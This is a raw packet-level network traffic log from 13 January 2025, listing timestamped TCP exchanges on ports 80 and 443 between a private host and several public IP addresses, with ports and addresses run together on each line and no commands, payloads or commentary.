                                                                  Jan 13, 2025 22:52:31.445487976 CET8049723199.232.214.172192.168.2.4
                                                                  Jan 13, 2025 22:52:31.445537090 CET4972380192.168.2.4199.232.214.172
                                                                  Jan 13, 2025 22:52:31.460012913 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460074902 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460220098 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.460252047 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460285902 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460331917 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.460349083 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460531950 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.460589886 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.460603952 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461064100 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461106062 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461112022 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.461132050 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461153984 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461160898 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.461209059 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.461220980 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461275101 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.461831093 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.461879969 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.461956024 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.462002039 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.462121010 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.462162971 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.462853909 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.462915897 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.463192940 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.463238001 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.463558912 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.463619947 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.463711977 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.463757992 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.463794947 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.463846922 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.464549065 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.464597940 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.464706898 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.464751959 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551001072 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551043034 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551069975 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551100016 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551114082 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551119089 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551145077 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551146030 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551181078 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551183939 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551213026 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551239967 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551713943 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551753998 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551769972 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551789999 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551810026 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.551825047 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.551846027 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552052975 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552090883 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552102089 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552117109 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552138090 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552150011 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552170992 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552500963 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552532911 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552551985 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552562952 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552591085 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552604914 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.552608967 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.552656889 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.554064035 CET49769443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:31.554091930 CET44349769104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.751832962 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.752948999 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.753017902 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.754148006 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.755217075 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.755321026 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.755434990 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.759504080 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.759555101 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.759618998 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.759769917 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:31.759792089 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:31.799338102 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.886190891 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.886290073 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.886360884 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.886527061 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.886575937 CET4434977235.190.80.1192.168.2.4
                                                                  Jan 13, 2025 22:52:31.886605024 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:31.886631966 CET49772443192.168.2.435.190.80.1
                                                                  Jan 13, 2025 22:52:32.159962893 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.160013914 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.160150051 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.160316944 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.160342932 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.246274948 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.246803045 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:32.246824980 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.247283936 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.249268055 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:32.249353886 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.249614000 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:32.291322947 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.399785995 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.399890900 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.399977922 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:32.425052881 CET49775443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:32.425071001 CET44349775104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.620232105 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.620668888 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.620734930 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.621215105 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.621717930 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.621812105 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.621857882 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.663408995 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.670294046 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.777857065 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.777954102 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.778028011 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.778099060 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.778100014 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.778898001 CET49776443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.778939009 CET44349776104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.793432951 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.793530941 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:32.793636084 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.793813944 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:32.793850899 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.252859116 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.253372908 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.253438950 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.254550934 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.255048990 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.255139112 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.255238056 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.295332909 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.400588036 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.400677919 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.400751114 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.402085066 CET49777443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.402122974 CET44349777104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.406331062 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.406367064 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.406598091 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.406948090 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.406963110 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.856189013 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.856285095 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.856375933 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.856995106 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:33.857037067 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.874697924 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.875200987 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.875226974 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.875708103 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.876149893 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.876230001 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:33.876390934 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:33.919359922 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.036082983 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.036253929 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.036408901 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:34.036890030 CET49778443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:34.036911011 CET44349778104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.330718994 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.331080914 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.331103086 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.332606077 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.333425999 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.333425999 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.333425999 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.333451986 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.333493948 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.333523989 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.333592892 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.333642006 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.383819103 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.591950893 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592068911 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592148066 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592230082 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.592232943 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592286110 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592334986 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.592344046 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592386961 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.592392921 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592530012 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.592586040 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.592592001 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.596605062 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.596662045 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.596668959 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.596759081 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.596817017 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.596824884 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.642482042 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.681555033 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.681709051 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.681792021 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.681859016 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.681879997 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.681912899 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682041883 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682044983 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.682064056 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682162046 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.682178020 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682244062 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.682257891 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682344913 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682409048 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.682421923 CET44349779104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.682434082 CET49779443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:34.699404955 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:34.699448109 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:34.699525118 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:34.699717999 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:34.699728966 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.173742056 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.174079895 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.174107075 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.174632072 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.174933910 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.175020933 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.175071955 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.219331980 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.226675034 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.315125942 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.315296888 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:35.315366030 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.315797091 CET49780443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:35.315814972 CET44349780104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.313685894 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.313824892 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.313951969 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.314302921 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.314389944 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.797910929 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.798362970 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.798429966 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.798948050 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.799299955 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.799453974 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.799480915 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.799520016 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.799550056 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.799571037 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.799595118 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:39.799691916 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:39.799771070 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115066051 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115166903 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115201950 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115240097 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115252972 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:40.115335941 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115365982 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.115386963 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:40.115413904 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:40.115978956 CET49781443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:40.116008997 CET44349781104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.121170044 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.121222973 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.121289968 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.121648073 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.121670008 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.196602106 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.196701050 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.196873903 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.197052002 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.197072983 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.594321966 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.594559908 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.594600916 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.595065117 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.595331907 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.595416069 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.595443010 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.639336109 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.648550034 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.668548107 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.668896914 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.668960094 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.670656919 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.670759916 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.671683073 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.671775103 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.671858072 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.671876907 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:40.725545883 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:40.758519888 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.758584023 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:40.758758068 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.759252071 CET49782443192.168.2.4104.18.95.41
                                                                  Jan 13, 2025 22:52:40.759284973 CET44349782104.18.95.41192.168.2.4
                                                                  Jan 13, 2025 22:52:41.205248117 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.205507994 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.205591917 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:41.206007004 CET49783443192.168.2.4104.21.112.1
                                                                  Jan 13, 2025 22:52:41.206026077 CET44349783104.21.112.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.430059910 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.430111885 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.430176973 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.430470943 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.430488110 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.889709949 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.890125036 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.890187025 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.891794920 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.891868114 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.892615080 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.892699003 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.892966032 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:41.892982960 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:41.945532084 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:42.511255026 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:42.511398077 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:52:42.511499882 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:42.512593985 CET49786443192.168.2.4104.21.32.1
                                                                  Jan 13, 2025 22:52:42.512634039 CET44349786104.21.32.1192.168.2.4
                                                                  Jan 13, 2025 22:53:16.837357998 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:16.837450027 CET44349884142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:53:16.837529898 CET49884443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:53:16.837729931 CET49884443192.168.2.4142.250.185.228
